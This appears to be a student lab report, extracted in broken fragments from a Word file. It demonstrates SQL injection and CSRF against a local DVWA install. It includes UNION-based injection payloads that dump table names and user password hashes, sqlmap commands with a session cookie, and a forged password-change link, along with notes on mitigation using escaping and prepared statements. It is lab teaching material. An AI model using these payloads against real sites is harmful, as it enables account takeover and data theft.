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Perform Cross-site Request Forgery (CSRF) Attack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demonstrate a Cross-Site Request Forgery (CSRF) attack using the Damn Vulnerable Web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Application (DVWA) running on XAMPP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XAMPP (Apache + MySQL + PHP)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DVWA (Damn Vulnerable Web Application)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SQL Injection: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(username = 'admin' AND password = '') OR 1=1 OR ''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 =1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http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit#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$id = $_REQUEST[ 'id' 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switch ($_DVWA['SQLI_DB'])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case MYSQL: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// Check database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$query = "SELECT first_name, last_name FROM users WHERE user_id = '$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id';";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Database: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 base available in dvwa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1’ union select 1, table_schema from information_schema.tables union select 1, ‘1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leading ' closes the application’s open quote.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UNION SELECT 1, table_name — returns two columns to match id, title.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information_schema.tables WHERE table_schema = 'dvwa' — restricts to the dvwa schema.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comments out the remainder of the original SQL to avoid syntax errors.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 tables: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classic UNION-based SQL injection attempt intended to enumerate database metadata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1’ union select 1, table_name from information_schema.tables where table_schema= ‘dvwa’ union select 1, ‘1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Close an existing quoted value in the original query (1'),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Append rows from information_schema.tables (specifically the table_schema column) to the original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 set using UNION SELECT,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 another UNION SELECT that supplies a harmless row (1, '1') to match column/type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requirements or confuse filters.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 account will be in users table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Get Column information of the table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Get Columns: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1’ union select 1, column_name from information_schema.columns where table_schema =’dvwa’ and table_name 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‘users’ union select 1, ‘1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Username and Password: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Query: 1’ union select 1,concat(user, “:”,password) from dvwa.users union select 1,’1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Table columns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User id                First_name              Last_name               User             password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username password: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admin: 5f4dcc3b5aa765d61d8327deb882cf99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 crackstation.net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1.Escape when quotations are encountered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$id = $_POST[ 'id' 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$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);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Sanitize input and validate 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$id = $_GET[ 'id' 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// Was a number entered?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if(is_numeric( $id ))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$id = intval ($id);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switch ($_DVWA['SQLI_DB'])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MYSQL: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// Check the database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$data = $db-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&gt;prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT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'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$data-&gt;bindParam( ':id', $id, PDO::PARAM_INT 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Open Zap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browser 127.0.0.1/DAWN enter admin:password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ZAP captures the request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 has session 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Download SQLMAP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Unzip go that folder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C:\Users\balus\Downloads\sqlmap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 sqlmap.py -h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 sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit" 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cookie="PHPSESSID=g833nc5k1lcj0nnggvumnfj1o4; security=low" --proxy="http://localhost:8080"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-dbs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security=low; PHPSESSID=g833nc5k1lcj0nnggvumnfj1o4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-D dvwa –tables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CSRF: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Cross site Request forgery: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&lt;textarea&gt;hello&lt;/textarea&gt;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http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=temp123&amp;password_conf=temp123&amp;C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hange=Change#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enter temp123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href="http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=hacked&amp;password_conf=hacked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&amp;Change=Change#"&gt;Click Here&lt;/a&gt;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Open in zap browser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After the victim (still logged into DVWA) visits the attacker page, the target action executes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automatically.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114300" distR="114300">
            <wp:extent cx="5029200" cy="6087216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114300" distR="114300">
            <wp:extent cx="5029200" cy="4652481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114300" distR="114300">
            <wp:extent cx="5029200" cy="2163726"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"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5029200" cy="1720955"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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114300" distR="114300">
            <wp:extent cx="5029200" cy="1940527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114300" distR="114300">
            <wp:extent cx="5029200" cy="3516561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114300" distR="114300">
            <wp:extent cx="5029200" cy="1639421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114300" distR="114300">
            <wp:extent cx="5029200" cy="2541458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114300" distR="114300">
            <wp:extent cx="5029200" cy="964453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114300" distR="114300">
            <wp:extent cx="5029200" cy="2480434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114300" distR="114300">
            <wp:extent cx="5029200" cy="2332175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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114300" distR="114300">
            <wp:extent cx="5029200" cy="555523"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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114300" distR="114300">
            <wp:extent cx="5029200" cy="3498908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114300" distR="114300">
            <wp:extent cx="5029200" cy="1548848"/>
            <wp:effectExtent b="0" l="0" r="0" t="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114300" distR="114300">
            <wp:extent cx="5029200" cy="263853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114300" distR="114300">
            <wp:extent cx="5029200" cy="1120442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114300" distR="114300">
            <wp:extent cx="5029200" cy="4094194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image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jp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17.jp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5.jp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PyA+pE+5GHd9CxYbowqkw8dAg==">CgMxLjA4AHIhMXdTeGY4MzJVa3JFajRKN1BGQllBMkVNUWdDbDJiYTBj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